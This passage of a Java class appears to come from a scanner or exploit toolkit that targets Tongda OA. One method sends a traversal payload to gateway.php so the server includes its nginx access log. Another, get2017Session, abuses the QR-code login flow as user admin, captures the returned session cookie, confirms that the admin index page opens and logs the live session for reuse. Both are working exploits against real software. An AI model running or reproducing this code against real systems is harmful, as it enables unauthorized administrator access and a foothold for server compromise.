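                    if (setCookie != null) {
                        WriteLog(setCookie.toString());
                    } else {
                        WriteLog("响应中未返回 Set-Cookie");
                    }
                }else {
                    WriteFailLog("未检测到漏洞 ");
                }
                break;
            default:
                break;
        }
    }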

    /**
     * Checks for the Tongda OA v11.8 {@code gateway.php} file inclusion.
     *
     * <p>POC: posts a {@code json} field whose {@code url} points at the nginx access log to
     * {@code /ispirit/interface/gateway.php}. When that answers 200 without
     * {@code ERROR URL}, the same body is posted to {@code /mac/gateway.php}; a hit is
     * reported when that second response is a 200 whose body contains {@code POST}.
     * EXP: not implemented; only a message is logged.
     *
     * @param type   {@code POC} or {@code EXP}
     * @param target base URL; it is concatenated directly with paths starting with "/"
     * @param args   unused
     * @throws MalformedURLException declared by the signature; presumably raised by the
     *         HttpRequest constructor for an invalid URL (not visible here)
     */
    @VulnerabilityDescriptionMapping(Description = "通达OA v11.8 getway.php 远程文件包含漏洞",SupportVulType = SupportVul.信息泄露)
    public void vul_getway_php(Poc_Exp type, String target,Object... args) throws MalformedURLException {
        WriteLog("通达OA v11.8 getway.php 远程文件包含漏洞");
        final String firstPath = "/ispirit/interface/gateway.php";
        switch (type) {
            case EXP:
                WriteLog("\n SQL注入 没有Exp");
                break;
            case POC:
                HttpRequest firstRequest = new HttpRequest(target + firstPath);
                // Both requests carry the same form body.
                final String includeBody = "json={\"url\":\"/general/../../nginx/logs/oa.access.log\"}";
                Response first = firstRequest.Post(includeBody);
                if (first.statusCode != 200 || first.responseBody.contains("ERROR URL")) {
                    WriteFailLog("未检测到漏洞 ");
                    break;
                }

                Response second = new HttpRequest(target + "/mac/gateway.php").Post(includeBody);
                // "POST" in the body is taken as evidence that log content was returned.
                boolean logIncluded = second.statusCode == 200 && second.responseBody.contains("POST");
                if (logIncluded) {
                    WriteSuccessLog("存在漏洞");
                } else {
                    WriteFailLog("未检测到包含到日志文件 请手动测试");
                }
                break;
        }
    }


    /**
     * Probes the Tongda OA 2017 QR-code login flow and logs whether
     * {@code /general/index.php} can be opened afterwards. No caller is visible in this file.
     *
     * <p>Steps: GET {@code /ispirit/login_code.php} and read {@code codeuid} from the JSON
     * body; POST it to {@code /general/login_code_scan.php} as a confirmation for
     * {@code UID=1} / {@code username=admin}; when the returned {@code status} contains "1",
     * GET {@code /ispirit/login_code_check.php}, copy its {@code Set-Cookie} value into a
     * {@code Cookie} header and GET {@code /general/index.php}. The target is reported as
     * vulnerable when that last body does not contain {@code window.top.location='/'}.
     *
     * <p>The log messages name {@code getV11Session}; they are runtime strings and are left
     * as they are. On a hit the cookie sent with the last request is logged; it is a live
     * session cookie, so the log should be handled as sensitive data.
     *
     * @param target base URL; it is concatenated directly with paths starting with "/"
     */
    public void get2017Session(String target){
    try {
        String checkUrl = target + "/ispirit/login_code.php";

        String resText = new HttpRequest(checkUrl).Get("").responseBody;
        JSONObject json = JSONObject.parseObject(resText);

        // A non-String value makes this cast throw; the outer catch then logs the generic error.
        String codeUid = (String) json.get("codeuid");
        String data = "codeuid=" + codeUid + "&UID=1&source=pc&type=confirm&username=admin"; // earlier form shape: {'CODEUID': '{'+codeUid+'}', 'UID': int(1)}
        Response response = new HttpRequest(target + "/general/login_code_scan.php").Post(data);
        JSONObject json2 = JSONObject.parseObject(response.responseBody);

        // Same cast caveat as above; a missing "status" key yields null and the contains()
        // call below then throws into the outer catch.
        String status = (String) json2.get("status");
        if (status.contains("1")){
            String check = target + "/ispirit/login_code_check.php?codeuid=" + codeUid;
            HttpRequest req = new HttpRequest(check);
            Response response1 = req.Get("");
            // Fetch the cookie returned by the check endpoint.
            String tmp_cookie = null;

            String index = target + "/general/index.php";
            HttpRequest request = new HttpRequest(index);
            try {
                // The header value is taken through toString() and the list brackets are removed.
                tmp_cookie = response1.responseHeader.get("Set-Cookie").toString();
                tmp_cookie = tmp_cookie.replace("[","");
                tmp_cookie = tmp_cookie.replace("]","");
                request.addHeaders("Cookie", tmp_cookie);

            }catch (Exception e){
                // Deliberately ignored: without a Set-Cookie header the index request is sent with no cookie.
            }
            Response response2 =  request.Get("");
            // NOTE(review): the verdict is "marker absent", so an error page or an empty body
            // is also reported as a hit; confirm manually.
            if (!response2.responseBody.contains("window.top.location='/'")) {
                WriteLog("\n getV11Session 检测到漏洞 Session：" + response2.requestHeader.get("Cookie"));
                WriteLog("\n 拿着session 去登录" + target+"/general/index.php");

                return ;
            } else {
                WriteLog("\n getV11Session 未检测到漏洞 ");
                return ;
            }
        }else {
            // Nothing is logged when the scan confirmation is not accepted.
        }





    } catch (Exception e) {
        // Any failure (network, JSON parsing, cast, null value) ends the check with a generic message.
        WriteLog("\n function getV11Session 出现异常");
        return ;
    }
}
    /**
     * Scratch entry point: prints a two-element list and exercises none of the checks in
     * this class.
     *
     * @param args ignored
     */
    public static void main(String[] args) {
        List<String> sample = new ArrayList<>(Arrays.asList("123", "456"));
        System.out.println(sample);
    }
}
